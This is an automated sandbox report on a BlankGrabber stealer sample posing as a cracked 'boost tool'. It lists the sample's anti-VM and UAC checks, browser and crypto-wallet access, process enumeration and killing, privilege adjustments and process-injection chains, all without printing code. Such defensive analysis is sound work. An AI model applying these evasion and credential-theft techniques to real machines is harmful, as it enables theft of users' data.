Malware Analysis Report

2024-10-10 08:29

Sample ID 240622-ral3hs1aja
Target boostup_boost_tool_cracked.zip
SHA256 a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Tags blankgrabber evasion trojan execution spyware stealer themida upx
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63

Threat Level: Known bad

The file boostup_boost_tool_cracked.zip was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion trojan execution spyware stealer themida upx

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Themida packer

Reads user/profile data of web browsers

UPX packed file

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Enumerates processes with tasklist

Gathers system information

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 13:59

Signatures

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

blankgrabber

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:03

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\system32\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\rundll32.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\system32\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

memory/2052-1-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-0-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-2-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-3-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-6-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-5-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-4-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-7-0x0000000053AF0000-0x00000000544CF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:02

Platform

win10v2004-20240508-en

Max time kernel

130s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
UPX packed file

upx
Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 3100 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 1404 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4300 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4300 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2376 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1972 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1972 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3740 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3740 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 972 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 972 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1584 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1404 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3268 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3268 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1404 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3264 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe
PID 3264 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe
PID 3836 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3836 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1404 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1400 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3892 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe C:\Windows\system32\cmd.exe
PID 3892 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4672 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\servicing\TrustedInstaller.exe
PID 4672 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\servicing\TrustedInstaller.exe
PID 1404 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
